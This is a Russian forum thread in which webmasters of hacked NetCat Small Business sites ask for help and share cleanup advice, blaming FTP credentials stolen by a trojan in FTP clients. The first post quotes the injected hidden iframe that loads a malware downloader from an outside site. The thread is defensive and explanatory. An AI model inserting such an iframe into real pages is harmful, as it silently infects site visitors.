|
|
14.06.2007, 14:25
|
|
sergmal
Зарегистрирован:
2007-06-14
Сообщений: 1
|
Как быть
На сайте стоит Small Business 2.2. Ставила web-студия.
Прошло 2 гда. Они куда-то пропали.
Произошел взлом.
При загрузке главной страницы определеяется вирус "downloader"
Внизу главной страницы появилась строка:
</html><iframe width=1 height=1 border=0 frameborder=0 src='http://www.werevolf.info/gruzit/index.php'></iframe>
Возможно и на других
Что делать?
Как убрать строку iframe?
|
|
|
14.06.2007, 14:46
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
http://netcat.ru/support/ncforum/?Subdiv_ID=1&Topic_ID=435
Temet nosce...
|
|
|
01.04.2008, 11:16
|
|
Гость
Гость
|
Неткат здесь не при чём, взломан FTP.
Зайдите на сайт по FTP и удалите этот код из всех файлов index После этого проверьте на вирусы все компьютеры, на которых настроено соединение по FTP с сайтом. Смените пароль для FTP.
|
|
|
28.05.2008, 16:49
|
|
elvizzz
Владимиров Василий
Зарегистрирован:
2008-05-08
Сообщений: 2
|
Фишка в том, что на Ваш комп засела троянская дрянь, которая селится в ФТП менеджерах (я пофиксил только в CuteFTP и во встроенном менеджере Тотал Командера).
Проблему решает следующий алгоритм:
1. Удаляете Ваш старый менеджер к чертям собачим
2. Проверяетесь у "венеролога" (например у NOD32)
3. Качаете и ставите WinSCP (winscp.net)
3.1 Меняете доступ по фтп
4. Через этого менеджера заходите на хостинг с уже новыми паролями
5. Проверяете каждый файлик ручками на наличие левого кода и удаляете этот код.
Полезная информация:
Вредоносный код любит файлы index.*, home.*, main.*, page.*, login.*, aauth.*...
В коде страницы код размещается либо внизу страницы после последнего тега, либо сразу после тега <body>.
Я так сделал несколько раз, и тьфу-тьфу... уже 3 месяца не достает... хотя ранеше валило с периодичностью раз в неделю...
И главное! Ни каких случайных связей ;)
шел, увидел, ушел...
|
|
|
10.12.2008, 19:55
|
|
Solovejs
Зарегистрирован:
2008-12-09
Сообщений: 1
|
Сайт был взломан похожим образом. Вот только на FTP не заходил ни разу через менеджер, но на всякий случай сменил все пароли, проверил на вирусы dr.web и Nod32 - комп чист.
Сайт лежит, где коды не нашел, в логах постоянные обращения к файлу s_loadenv.inc.php и e404 через некие внешние txt файлы (на которые собственно ругается антивирус). Патчи для Small Business установил (до версии 233), а вот как поднять теперь сайт даже не знаю.
Админ-панель целая, редактировать страницы можно, но при входе на сайт пишет CGI script error (CGI приложение невозможно прочитать или исполнить данным пользователем. Измените права исполнения на скрипт или PHP документ). Помогите, как быть. Я не знаком с файловой структурой netcat (сайт передали установленным и обращался только через админ-панель).
|
